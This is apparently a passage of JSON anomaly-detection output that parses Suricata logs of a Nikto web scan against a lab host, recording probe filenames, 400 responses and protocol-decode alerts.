"/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.types\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.types", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.types", 
"/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46782, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":941400980622918,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 941400980622918, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.168368+0000\",\"flow_id\":941400980622918,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.types\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.types\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", 
"PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.169890 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46784 -> 192.168.10.154:80", "/parser/model/time": 1583349514.16989, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46784, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.169890 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46784 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.stat", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.170041+0000\",\"flow_id\":1023417676108868,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stat\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stat\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.170041, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1023417676108868,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stat\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stat\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stat\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stat\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.stat\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.stat\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.stat", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": 
"mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.stat", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46784, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1023417676108868,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1023417676108868, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.170041+0000\",\"flow_id\":1023417676108868,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stat\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stat\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.171543 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46786 -> 192.168.10.154:80", "/parser/model/time": 1583349514.171543, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46786, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.171543 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46786 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.aspx", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.171725+0000\",\"flow_id\":921236109171523,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.aspx\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.aspx\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.171725, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":921236109171523,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.aspx\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.aspx\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.aspx\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.aspx\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.aspx\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.aspx\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.aspx", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.aspx", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": 
"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46786, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":921236109171523,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 921236109171523, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.171725+0000\",\"flow_id\":921236109171523,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.aspx\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.aspx\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 
1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.173460 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46788 -> 192.168.10.154:80", "/parser/model/time": 1583349514.17346, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46788, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.173460 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46788 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": 
"NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.c", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.173752+0000\",\"flow_id\":1561375214838397,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.c\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.c\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.173752, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1561375214838397,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.c\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
